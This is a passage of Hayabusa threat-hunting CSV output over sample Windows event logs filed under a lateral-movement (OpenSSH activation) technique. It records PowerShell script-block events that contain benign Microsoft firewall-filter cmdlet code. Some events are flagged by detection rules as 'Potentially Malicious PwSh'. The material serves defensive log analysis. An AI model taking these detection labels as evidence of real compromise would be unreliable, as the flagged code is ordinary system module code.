[OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType[]] ${InterfaceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('InterfaceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InterfaceType}) $__cmdletization_queryBuilder.FilterByProperty('InterfaceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceTypeFilter' -Alias '*' function Set-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceTypeFilter' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.370 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceTypeFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType[]] ${InterfaceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('InterfaceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InterfaceType}) $__cmdletization_queryBuilder.FilterByProperty('InterfaceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceTypeFilter' -Alias '*' function Set-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceTypeFilter' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.371 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.371 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.372 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallInterfaceTypeFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.372 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallInterfaceTypeFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.401 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication[]] ${Authentication}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption[]] ${Encryption}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${OverrideBlockRules}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${LocalUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteMachine}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Authentication') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Authentication}) $__cmdletization_queryBuilder.FilterByProperty('Authentication', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Encryption') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Encryption}) $__cmdletization_queryBuilder.FilterByProperty('Encryption', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OverrideBlockRules') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OverrideBlockRules}) $__cmdletization_queryBuilder.FilterByProperty('OverrideBlockRules', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalUser}) $__cmdletization_queryBuilder.FilterByProperty('LocalUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteUser}) 